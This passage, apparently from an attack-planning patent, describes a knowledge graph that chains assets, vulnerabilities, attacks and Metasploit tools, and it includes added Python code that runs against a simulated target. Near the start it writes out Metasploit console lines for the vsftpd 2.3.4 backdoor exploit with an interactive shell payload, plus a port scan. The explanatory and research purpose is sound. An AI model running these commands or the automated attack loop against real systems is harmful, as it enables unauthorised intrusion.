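    def __init__(self, module_type, module_name, log):
        super().__init__()
        self.module_type, self.module_name, self.log = module_type, module_name, log

    def execute(self, payload=None):
        self.log.append((self.module_type, self.module_name, dict(self), payload))
        return {"job_id": len(self.log), "uuid": f"constructed-{len(self.log)}"}


class FakeClient:
    """Minimal look-alike of MsfRpcClient exposing only .modules.use()."""
    def __init__(self):
        self.log = []
        self.modules = self

    def use(self, module_type, module_name):
        return FakeModule(module_type, module_name, self.log)


# Constructed 'tool usage' attributes; the module paths are real Metasploit modules.
VSFTPD_USAGE = """
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.3
set PAYLOAD cmd/unix/interact
exploit
"""
PORTSCAN_USAGE = "use auxiliary/scanner/portscan/tcp\nset RHOSTS 192.168.1.3\nset PORTS 21,22,8080\nrun"
```

Keeping the usage attribute to a small, whitelisted grammar is the practitioner's caveat here: the graph is populated partly by crawlers and manual annotation, so a tool entity must never be able to smuggle an arbitrary console command into the executor. The real `execute` returns a job id and uuid; the patent's "attack result" attribute would then be filled from the session or job output that Metasploit reports for that job.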

[0119] This invention also discloses a computer program product or computer program comprising computer instructions stored in a computer-readable storage medium. A processor of a computer device can read the computer instructions from the storage medium and execute them, causing the computer device to perform the method shown in Figure 1.

[0120] This invention implements a cybersecurity ontology model oriented towards attack planning, effectively modeling the cyberspace elements involved in penetration testing and integrating multiple categories of risk elements; based on the standardization of Metasploit tool interfaces, attack tools can effectively link with knowledge graphs, fully collecting feedback information generated during penetration testing; and based on knowledge graph attack planning algorithms, by constructing attack element chains and priority evaluation algorithms, global network attack and defense reasoning can be achieved.

[0121] In some alternative embodiments, the functions / operations mentioned in the block diagrams may not occur in the order shown in the operation diagrams. For example, depending on the functions / operations involved, two consecutively shown blocks may actually be executed substantially simultaneously, or the blocks may sometimes be executed in reverse order. Furthermore, the embodiments presented and described in the flowcharts of this invention are provided by way of example to provide a more comprehensive understanding of the technology. The disclosed methods are not limited to the operations and logic flows presented herein. Alternative embodiments are contemplated in which the order of various operations is altered and sub-operations described as part of a larger operation are executed independently.

[0122] Furthermore, although the invention has been described in the context of functional modules, it should be understood that, unless otherwise stated, one or more of the described functions and/or features may be integrated into a single physical device and/or software module, or one or more functions and/or features may be implemented in a separate physical device or software module. It is also understood that a detailed discussion of the actual implementation of each module is unnecessary for understanding the invention. Rather, given the properties, functions, and internal relationships of the various functional modules in the apparatus disclosed herein, the actual implementation of the module will be understood within the scope of conventional skill of an engineer. Therefore, those skilled in the art can implement the invention as set forth in the claims using ordinary techniques without excessive experimentation. It is also understood that the specific concepts disclosed are merely illustrative and not intended to limit the scope of the invention, which is determined by the full scope of the appended claims and their equivalents.

[0123] If the aforementioned functions are implemented as software functional units and sold or used as independent products, they can be stored in a computer-readable storage medium. Based on this understanding, the technical solution of this invention, essentially, or the part that contributes to the prior art, or a portion of the technical solution, can be embodied in the form of a software product. This computer software product is stored in a storage medium and includes several instructions to cause a computer device (which may be a personal computer, server, or network device, etc.) to execute all or part of the steps of the methods described in the various embodiments of this invention. The aforementioned storage medium includes various media capable of storing program code, such as USB flash drives, portable hard drives, read-only memory (ROM), random access memory (RAM), magnetic disks, or optical disks.

[0124] The logic and/or steps represented in the flowchart or otherwise described herein can be considered, for example, as a sequenced list of executable instructions for implementing logical functions, and can be embodied in any computer-readable medium for use by, or in conjunction with, an instruction execution system, apparatus, or device (such as a computer-based system, a system including a processor, or another system that can fetch instructions from an instruction execution system, apparatus, or device and execute them). For the purposes of this specification, a "computer-readable medium" can be any means that can contain, store, communicate, propagate, or transmit a program for use by, or in conjunction with, an instruction execution system, apparatus, or device.

[0125] In the description of this specification, references to terms such as "one embodiment," "some embodiments," "example," "specific example," or "some examples," etc., indicate that a specific feature, structure, material, or characteristic described in connection with that embodiment or example is included in at least one embodiment or example of the invention. In this specification, the illustrative expressions of the above terms do not necessarily refer to the same embodiment or example. Furthermore, the specific features, structures, materials, or characteristics described may be combined in any suitable manner in one or more embodiments or examples.

[0126] Although embodiments of the invention have been shown and described, those skilled in the art will understand that various changes, modifications, substitutions and alterations can be made to these embodiments without departing from the principles and spirit of the invention, the scope of which is defined by the claims and their equivalents.

[0127] The above is a detailed description of the preferred embodiments of the present invention, but the present invention is not limited to the embodiments described. Those skilled in the art can make various equivalent modifications or substitutions without departing from the spirit of the present invention, and these equivalent modifications or substitutions are all included within the scope defined by the claims of this application.

Claims

1. A method for constructing a multi-category risk factor attack planning model, characterized in that it includes the following steps: acquiring multiple categories of risk elements and building an attack planning knowledge graph; selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset to form an attack element chain; loading the attack element chain into the attack planning model to attack the target asset; and optimizing the attack planning model based on feedback information from the target asset after the attack. The entities of the risk elements include vulnerability elements, attack elements, tool elements, static asset elements, and dynamic asset elements. The relationships among the risk elements include: the dynamic asset elements are associated with the static asset elements; the static asset elements have the vulnerability elements; the attack elements are associated with the tool elements; the tool elements utilize the vulnerability elements to act on the dynamic asset elements; and the dynamic asset elements implement the attack elements.

2. The method for constructing a multi-category risk factor attack planning model according to claim 1, characterized in that acquiring the multiple categories of risk elements specifically combines automated acquisition with manual annotation: automated acquisition uses web crawler scripts to crawl attribute data from open-source datasets as risk element entities, and after the risk elements have been acquired, the relationships between them are annotated manually.

3. The method for constructing a multi-category risk factor attack planning model according to claim 1, characterized in that selecting risk elements from the attack planning knowledge graph based on the physical characteristics of the target asset specifically includes the following steps: analyzing the protection strength of the target asset across various dimensions, wherein the dimensions of the target asset include an asset dimension, a configuration dimension, and a protection dimension; determining, with a priority algorithm, the target asset dimension with the lowest protection strength; and, for that dimension, extracting the corresponding risk elements from the knowledge graph to form an attack element chain.

4. The method for constructing a multi-category risk factor attack planning model according to claim 3, characterized in that the resulting attack element chain includes dynamic asset elements, attack elements associated with the dynamic asset elements, tool elements associated with the attack elements, vulnerability elements associated with the tool elements, and static asset elements associated with the vulnerability elements.

5. The method for constructing a multi-category risk factor attack planning model according to claim 3, characterized in that attacking the target asset specifically includes the following steps: initializing the dynamic asset elements to form a network topology; querying the static asset elements associated with the dynamic asset elements to obtain the attack elements that the dynamic asset elements can execute; based on those executable attack elements, querying the tool elements associated with the attack elements; querying the sub-tools associated with each tool element and, if any exist, further querying the tool elements of the sub-tools; and using the tool elements so obtained to attack the target asset.

6. The method for constructing a multi-category risk factor attack planning model according to claim 5, characterized in that optimizing the attack planning model based on feedback information from the target asset after the attack specifically includes the following steps: collecting the feedback information generated after the attack planning model attacks the target asset; when the feedback information is a vulnerability of the target asset, querying the static asset elements that have that vulnerability element and updating the vulnerability element on the dynamic asset elements in the attack element chain; and when the feedback information is attribute information of the target asset itself, updating that attribute information directly on the dynamic asset elements in the attack element chain.

7. The method for constructing a multi-category risk factor attack planning model according to claim 6, characterized in that, when an attack by the attack planning model on the target asset generates no new feedback information, the attack operation ends and the optimization of the attack planning model is complete.

8. An electronic device, characterized in that it includes a processor and a memory; the memory is used to store a program; and the processor executes the program to implement the method according to any one of claims 1 to 7.

9. A computer-readable storage medium, characterized in that the storage medium stores a program which, when executed by a processor, implements the method according to any one of claims 1 to 7.
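Claims 1 and 3 to 7 together specify the graph schema (five entity classes and five relations), the chain query, and the feedback loop that ends when an attack yields nothing new. The following in-memory knowledge graph is an added example that implements those steps; it is not the patent's own code. Entity names, relation labels, the numeric protection strengths and the simulated target are constructed for illustration, and the vulnerability identifiers are placeholders rather than real CVE ids. It goes slightly beyond any single claim by applying the weakest-dimension selection of claim 3 inside the chain query of claims 4 and 5 and by expanding sub-tools in the same pass.

```python
"""Attack-planning knowledge graph: schema of claim 1, chain query of claims 3-5,
feedback update of claims 6-7.  Added example; every identifier below is constructed."""
from collections import defaultdict

DIMENSIONS = ("asset", "configuration", "protection")   # claim 3


class KnowledgeGraph:
    def __init__(self):
        self.entities = {}                 # id -> {"kind": ..., attribute: value, ...}
        self.edges = defaultdict(set)      # (source id, relation) -> {target ids}

    def add(self, kind, ident, **attrs):
        self.entities[ident] = {"kind": kind, **attrs}
        return ident

    def relate(self, src, relation, dst):
        self.edges[(src, relation)].add(dst)

    def out(self, src, relation):
        return sorted(self.edges.get((src, relation), ()))

    def sources_of(self, relation, dst):
        """Reverse lookup: which entities point at dst through relation."""
        return sorted(s for (s, r), dsts in self.edges.items() if r == relation and dst in dsts)


def weakest_dimension(kg, static_asset):
    """Claim 3: the dimension with the lowest protection strength is attacked first."""
    strength = kg.entities[static_asset]["protection"]
    return min(DIMENSIONS, key=lambda d: strength[d])


def build_attack_chain(kg, dynamic_asset):
    """Claims 4-5: dynamic asset -> attack -> tool (sub-tools expanded) -> vulnerability -> static asset,
    restricted to vulnerabilities in the weakest dimension of the associated static asset."""
    chains = []
    for static in kg.out(dynamic_asset, "associated_with"):
        dim = weakest_dimension(kg, static)
        for vuln in kg.out(static, "has"):
            if kg.entities[vuln]["dimension"] != dim:
                continue
            for attack in kg.out(dynamic_asset, "implements"):
                for tool in kg.out(attack, "uses_tool"):
                    for t in [tool, *kg.out(tool, "sub_tool")]:          # claim 5: sub-tools
                        if vuln in kg.out(t, "utilizes") and dynamic_asset in kg.out(t, "acts_on"):
                            chains.append({"dynamic": dynamic_asset, "attack": attack, "tool": t,
                                           "vulnerability": vuln, "static": static})
    return chains


def apply_feedback(kg, chain, feedback):
    """Claim 6. feedback is a list of ("vulnerability", id) or ("attribute", {k: v}) items.
    Returns True only when the dynamic asset gained information it did not already hold."""
    changed = False
    dyn = kg.entities[chain["dynamic"]]
    for kind, value in feedback:
        if kind == "vulnerability":
            carriers = kg.sources_of("has", value)       # static assets that have this vulnerability
            known = dyn.setdefault("vulnerabilities", {})
            if value not in known:
                known[value] = carriers
                changed = True
        elif kind == "attribute":
            for key, val in value.items():
                if dyn.get(key) != val:
                    dyn[key] = val
                    changed = True
    return changed


def plan_and_attack(kg, dynamic_asset, execute, max_rounds=10):
    """Claims 5-7: attack along the chain, fold feedback into the graph, stop when nothing is new.
    execute(chain) stands in for the Metasploit invocation and returns the feedback list."""
    history = []
    for _ in range(max_rounds):
        chains = build_attack_chain(kg, dynamic_asset)
        if not chains:
            break
        new_info = False
        for chain in chains:
            feedback = execute(chain)
            history.append((chain["tool"], feedback))
            new_info = apply_feedback(kg, chain, feedback) or new_info
        if not new_info:
            break                                          # claim 7: no new feedback, done
    return history


def sample_graph():
    """Constructed graph: one host, one service, two placeholder vulnerabilities, one tool family."""
    kg = KnowledgeGraph()
    kg.add("dynamic_asset", "host-A", ip="10.0.0.5")
    kg.add("static_asset", "ftp-service", protection={"asset": 3, "configuration": 1, "protection": 2})
    kg.add("vulnerability", "VULN-CFG-1", dimension="configuration")    # placeholder, not a CVE
    kg.add("vulnerability", "VULN-PROT-1", dimension="protection")      # placeholder, not a CVE
    kg.add("attack", "initial-access")
    kg.add("tool", "msf-exploit-family")
    kg.add("tool", "msf-exploit-cfg")
    kg.relate("host-A", "associated_with", "ftp-service")
    kg.relate("ftp-service", "has", "VULN-CFG-1")
    kg.relate("ftp-service", "has", "VULN-PROT-1")
    kg.relate("host-A", "implements", "initial-access")
    kg.relate("initial-access", "uses_tool", "msf-exploit-family")
    kg.relate("msf-exploit-family", "sub_tool", "msf-exploit-cfg")
    kg.relate("msf-exploit-cfg", "utilizes", "VULN-CFG-1")
    kg.relate("msf-exploit-cfg", "acts_on", "host-A")
    return kg


def simulated_target(chain):
    """Constructed feedback: the target leaks an attribute and confirms the exploited vulnerability."""
    return [("attribute", {"os": "linux"}), ("vulnerability", chain["vulnerability"])]
```

With sample_graph(), the configuration dimension has the lowest strength, so only VULN-CFG-1 and the sub-tool that utilizes it enter the chain; the first round adds the OS attribute and the vulnerability to host-A, the second round yields nothing new, and the loop stops, which is the termination condition of claim 7.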